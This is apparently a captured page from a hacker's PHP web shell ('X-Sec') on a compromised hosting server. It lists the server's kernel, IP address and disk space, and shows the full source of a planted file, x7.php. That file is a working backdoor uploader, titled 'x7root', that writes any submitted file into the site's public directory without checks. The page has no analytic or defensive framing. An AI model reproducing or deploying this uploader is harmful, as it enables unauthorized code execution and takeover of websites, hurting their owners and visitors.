X-Sec
C0d3d By Dr.D3m0
Apache
Linux cp31.g-dns.com 3.10.0-962.3.2.lve1.5.38.el7.x86_64 #1 SMP Thu Jun 18 05:28:41 EDT 2020 x86_64
server ip : 43.254.17.7
Total HDD Space : 2.14 TB | Free HDD Space : 260.07 GB
safemode OFF
 >  / home / lingtou / public_html /
Filename/home/lingtou/public_html/x7.php
Size567
Permissionrw-r--r--
Owner
Create time08-Aug-2024 19:55
Last modified08-Aug-2024 19:55
Last accessed08-Aug-2024 19:55
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<html><title> x7root </title><center><h1> x7root </h1><?php echo '<b>System Info:</b> '.php_uname().'<br>'.'<b>Current Directory:</b> '.getcwd();echo '<br><form method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="20"><input name="_upl" type="submit" id="_upl" value="Uploaded"></form></td></tr></table></pre>';if($_FILES){if(!empty($_FILES['file'])){move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);echo "<b>File Uploaded !!!</b><br>";}else{echo "<b>Upload Failed !!!</b><br><br>";}}?>